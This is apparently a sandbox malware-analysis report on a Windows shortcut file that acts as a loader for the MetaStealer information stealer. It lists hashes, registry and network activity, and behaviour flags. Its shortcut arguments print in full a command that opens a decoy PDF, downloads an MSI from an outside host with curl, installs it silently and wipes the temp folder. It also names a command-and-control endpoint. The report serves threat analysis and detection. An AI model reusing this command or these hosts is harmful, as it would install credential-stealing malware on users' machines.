File name:	Document_copy1001.lnk
Full analysis:	https://app.any.run/tasks/42bb8cef-33fa-4856-9499-67907dd22ba7
Verdict:	Malicious activity
Threats:	A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. MetaStealer is an info-stealing malware primarily targeting sensitive data like login credentials, payment details, and browser history. It typically infects systems via phishing emails or malicious downloads and can exfiltrate data to a command and control (C2) server. MetaStealer is known for its stealthy techniques, including evasion and persistence mechanisms, which make it difficult to detect. This malware has been actively used in various cyberattacks, particularly for financial theft and credential harvesting from individuals and organizations. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	January 10, 2025, 21:48:18
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	opendir loader uac stealer metastealer
Indicators:
MIME:	application/x-ms-shortcut
File info:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Unicoded, HasEnvironment "%comspec%", HasExpIcon "%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe", Archive, ctime=Tue May 21 10:01:42 2024, atime=Wed Jan 8 15:14:16 2025, mtime=Tue May 21 10:01:42 2024, length=289792, window=showminnoactive, IDListSize 0x0135, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\cmd.exe"
MD5:	A9813B3DAD75146A167694AB7650C2A6
SHA1:	65DDF0848263CE614D94B303550398F6E43A51DB
SHA256:	83B892FBBBCD6D49E4631F3ABD02B994C516AFE262224FA2420CE3DFA496C744
SSDEEP:	48:8zrM4DyCXnXi/dfRfXuHhQKYWCYW0ERJ:8z1DPXiBtueKe7J

Flags:	IDList, LinkInfo, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode, ExpString, ExpIcon
FileAttributes:	Archive
CreateDate:	2024:05:21 10:01:42+00:00
AccessDate:	2025:01:08 15:14:16+00:00
ModifyDate:	2024:05:21 10:01:42+00:00
TargetFileSize:	289792
IconIndex:	11
RunWindow:	Show Minimized No Activate
HotKey:	(none)
TargetFileDOSName:	cmd.exe
DriveType:	Fixed Disk
DriveSerialNumber:	10B1-9CE6
VolumeLabel:	-
LocalBasePath:	C:\Windows\System32\cmd.exe
RelativePath:	..\..\..\Windows\System32\cmd.exe
WorkingDirectory:	C:\Windows\System32
CommandLineArguments:	/k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -sLo %TEMP%\469aee4c-6462-461e-bd78-e15505783dfb.msi http://us7.info/host/install.msi & %TEMP%\469aee4c-6462-461e-bd78-e15505783dfb.msi /qn & del /q/f/s %TEMP% & exit
IconFileName:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
MachineID:	desktop-av6iau3


(PID) Process:	(6448) msedge.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:	write	Name:	failed_count
Value: 0
(PID) Process:	(6448) msedge.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:	write	Name:	state
Value: 2
(PID) Process:	(6448) msedge.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:	write	Name:	state
Value: 1
(PID) Process:	(6448) msedge.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\StabilityMetrics
Operation:	write	Name:	user_experience_metrics.stability.exited_cleanly
Value: 0
(PID) Process:	(6448) msedge.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault
Operation:	write	Name:	S-1-5-21-1693682860-607145093-2874071422-1001
Value: F70E5556F7892F00
(PID) Process:	(6448) msedge.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault
Operation:	write	Name:	S-1-5-21-1693682860-607145093-2874071422-1001
Value: A1D55E56F7892F00
(PID) Process:	(6448) msedge.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\262902
Operation:	write	Name:	WindowTabManagerFileMappingId
Value: {6355C05E-6315-4A89-A3A8-600A2A84557C}
(PID) Process:	(7652) msiexec.exe	Key:	HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\RestartManager\Session0000
Operation:	write	Name:	Owner
Value: E41D00002658BE60A963DB01
(PID) Process:	(7652) msiexec.exe	Key:	HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\RestartManager\Session0000
Operation:	write	Name:	SessionHash
Value: 210847A1D83703C3BA50C9C1BB2B5402DC2CA5EB5FF329FD1BECFDB4010E91C1
(PID) Process:	(7652) msiexec.exe	Key:	HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\RestartManager\Session0000
Operation:	write	Name:	Sequence
Value: 1

PID	Process	Filename		Type
6448	msedge.exe	C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old~RF1355b5.TMP		—
		MD5:—	SHA256:—
6448	msedge.exe	C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old		—
		MD5:—	SHA256:—
6448	msedge.exe	C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old~RF1355c4.TMP		—
		MD5:—	SHA256:—
6448	msedge.exe	C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old~RF1355c4.TMP		—
		MD5:—	SHA256:—
6448	msedge.exe	C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old		—
		MD5:—	SHA256:—
6448	msedge.exe	C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old		—
		MD5:—	SHA256:—
6448	msedge.exe	C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old~RF1355d4.TMP		—
		MD5:—	SHA256:—
6448	msedge.exe	C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old		—
		MD5:—	SHA256:—
6448	msedge.exe	C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old~RF1355d4.TMP		—
		MD5:—	SHA256:—
6448	msedge.exe	C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old		—
		MD5:—	SHA256:—

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	200	2.16.168.114:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
—	—	GET	200	95.101.149.131:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
1176	svchost.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
6456	curl.exe	GET	200	31.192.232.22:80	http://us7.info/host/install.msi	unknown	—	—	unknown
5064	SearchApp.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D	unknown	—	—	whitelisted
3092	install.exe	GET	200	193.32.177.34:443	http://camaaykaceeewkka.xyz:443/api/client_hello	unknown	—	—	unknown
8144	SIHClient.exe	GET	200	2.23.246.101:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl	unknown	—	—	whitelisted
8144	SIHClient.exe	GET	200	2.23.246.101:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl	unknown	—	—	whitelisted
4328	svchost.exe	GET	206	199.232.214.172:80	http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0c269ced-c74b-4e70-9b58-6e7999b292c0?P1=1736912842&P2=404&P3=2&P4=JvOWlgrGIdmSdQERGCsnno90syW2Ee67s89IurFHPuNVIT%2flB8hcbEnBOKxk%2bEbA%2fO74lTUp7UuWs2o%2b0SHAbA%3d%3d	unknown	—	—	whitelisted
4328	svchost.exe	HEAD	200	199.232.214.172:80	http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0c269ced-c74b-4e70-9b58-6e7999b292c0?P1=1736912842&P2=404&P3=2&P4=JvOWlgrGIdmSdQERGCsnno90syW2Ee67s89IurFHPuNVIT%2flB8hcbEnBOKxk%2bEbA%2fO74lTUp7UuWs2o%2b0SHAbA%3d%3d	unknown	—	—	whitelisted

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:137	—	—	—	whitelisted
4712	MoUsoCoreWorker.exe	40.127.240.158:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
—	—	40.127.240.158:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
5004	svchost.exe	40.127.240.158:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
—	—	2.16.168.114:80	crl.microsoft.com	Akamai International B.V.	RU	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
—	—	95.101.149.131:80	www.microsoft.com	Akamai International B.V.	NL	whitelisted
6456	curl.exe	31.192.232.22:80	us7.info	Chelyabinsk-Signal LLC	US	unknown
5064	SearchApp.exe	2.23.227.208:443	www.bing.com	Ooredoo Q.S.C.	QA	whitelisted
6920	msedge.exe	13.107.42.16:443	config.edge.skype.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted

Domain	IP	Reputation
google.com	172.217.16.206	whitelisted
crl.microsoft.com	2.16.168.114 2.16.168.124	whitelisted
www.microsoft.com	95.101.149.131 2.23.246.101	whitelisted
us7.info	31.192.232.22	unknown
www.bing.com	2.23.227.208 2.23.227.215	whitelisted
config.edge.skype.com	13.107.42.16	whitelisted
s28.q4cdn.com	185.172.148.128	whitelisted
edge.microsoft.com	204.79.197.239 13.107.21.239	whitelisted
edge-mobile-static.azureedge.net	13.107.246.45	whitelisted
business.bing.com	13.107.6.158	whitelisted

PID	Process	Class	Message
3724	search.exe	Misc activity	ET HUNTING EXE Base64 Encoded potential malware
3724	search.exe	Potentially Bad Traffic	ET POLICY HTTP traffic on port 443 (POST)
3724	search.exe	Potentially Bad Traffic	ET POLICY HTTP traffic on port 443 (POST)
3724	search.exe	Potentially Bad Traffic	ET POLICY HTTP traffic on port 443 (POST)
3724	search.exe	Potentially Bad Traffic	ET POLICY HTTP traffic on port 443 (POST)
3724	search.exe	Potentially Bad Traffic	ET POLICY HTTP traffic on port 443 (POST)

General Info

Document_copy1001.lnk

A9813B3DAD75146A167694AB7650C2A6

65DDF0848263CE614D94B303550398F6E43A51DB

83B892FBBBCD6D49E4631F3ABD02B994C516AFE262224FA2420CE3DFA496C744

48:8zrM4DyCXnXi/dfRfXuHhQKYWCYW0ERJ:8z1DPXiBtueKe7J

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Bypass User Account Control (ComputerDefaults)

METASTEALER has been detected (SURICATA)

Actions looks like stealing of personal data

Adds path to the Windows Defender exclusion list

SUSPICIOUS

Executable content was dropped or overwritten

Reads security settings of Internet Explorer

Unpacks CAB file

Script adds exclusion path to Windows Defender

Uses SYSTEMINFO.EXE to read the environment

Starts POWERSHELL.EXE for commands execution

INFO

Application launched itself

Execution of CURL command

Checks supported languages

The process uses the downloaded file

Reads the computer name

Create files in a temporary directory

Sends debugging messages

Executable content was dropped or overwritten

Reads the machine GUID from the registry

Reads Environment values

The sample compiled with english language support

Creates files or folders in the user directory

Checks if a key exists in the options dictionary (POWERSHELL)

Script raised an exception (POWERSHELL)

Process checks computer location settings

Malware configuration

Static information

TRiD

EXIF

LNK

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings